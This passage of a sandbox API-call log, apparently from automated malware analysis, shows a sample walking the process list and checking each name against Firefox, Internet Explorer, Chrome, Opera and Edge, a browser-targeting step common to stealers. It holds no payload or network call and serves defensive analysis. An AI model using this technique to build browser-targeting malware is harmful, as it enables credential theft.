(lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0202.103] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.103] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.103] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.103] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.103] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.103] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.103] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.104] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.104] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.104] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.104] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.104] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.104] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.104] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0202.105] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0202.105] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0202.105] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0202.105] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0202.105] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.105] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0202.105] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0202.105] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0202.105] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0202.105] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0202.105] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.105] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0202.106] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0202.106] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0202.106] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0202.106] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0202.106] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.106] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.106] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.106] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.106] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.106] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.106] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.106] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0202.107] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0202.107] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0202.107] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0202.107] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0202.107] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.107] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0202.108] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0202.108] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0202.108] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0202.108] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0202.108] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.108] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0202.108] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0202.108] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0202.108] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0202.108] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0202.108] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.108] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0202.109] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0202.109] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0202.109] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0202.109] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0202.109] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.109] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0202.109] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0202.109] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0202.109] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0202.109] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0202.109] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.110] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0202.110] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0202.110] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0202.110] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0202.110] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0202.110] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.110] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0202.111] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0202.111] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0202.111] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0202.111] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0202.111] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.111] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0202.111] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0202.111] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0202.111] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0202.111] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0202.111] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.111] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0202.112] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0202.112] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0202.112] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0202.112] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0202.112] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.112] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0202.112] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0202.112] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0202.112] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0202.113] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0202.113] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.113] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0202.113] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0202.113] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0202.113] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0202.113] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0202.113] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.113] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0202.114] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0202.114] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0202.114] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0202.114] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0202.114] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.114] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0202.114] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0202.114] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0202.114] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0202.114] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0202.114] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.114] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0202.115] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0202.115] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0202.115] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0202.115] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0202.115] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.115] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0202.115] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0202.115] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0202.115] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0202.115] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0202.115] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.116] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0202.116] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0202.116] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0202.116] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0202.116] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0202.116] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.116] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0202.117] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0202.117] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0202.117] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0202.117] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0202.117] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.117] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0202.117] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0202.117] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0202.117] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0202.117] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0202.117] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.117] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0202.118] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0202.118] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0202.118] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0202.118] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0202.118] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.118] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0202.118] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0202.118] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0202.118] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0202.118] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0202.118] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.118] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0202.119] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0202.119] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0202.119] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0202.119] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0202.119] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.119] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0202.120] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0202.120] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0202.120] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0202.120] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0202.120] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.120] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.120] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0202.120] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0202.120] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0202.120] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0202.120] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.120] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.121] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.121] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.121] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.121] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.121] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.121] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0202.121] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0202.121] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0202.121] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0202.121] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0202.121] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.121] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.122] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.122] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.122] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.122] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.122] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.122] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0202.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0202.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0202.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0202.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0202.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.123] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.177] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.177] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.177] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.177] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.177] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.177] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.177] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.177] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.178] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.178] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0202.178] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0202.178] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0202.178] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0202.178] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0202.178] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0202.178] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, 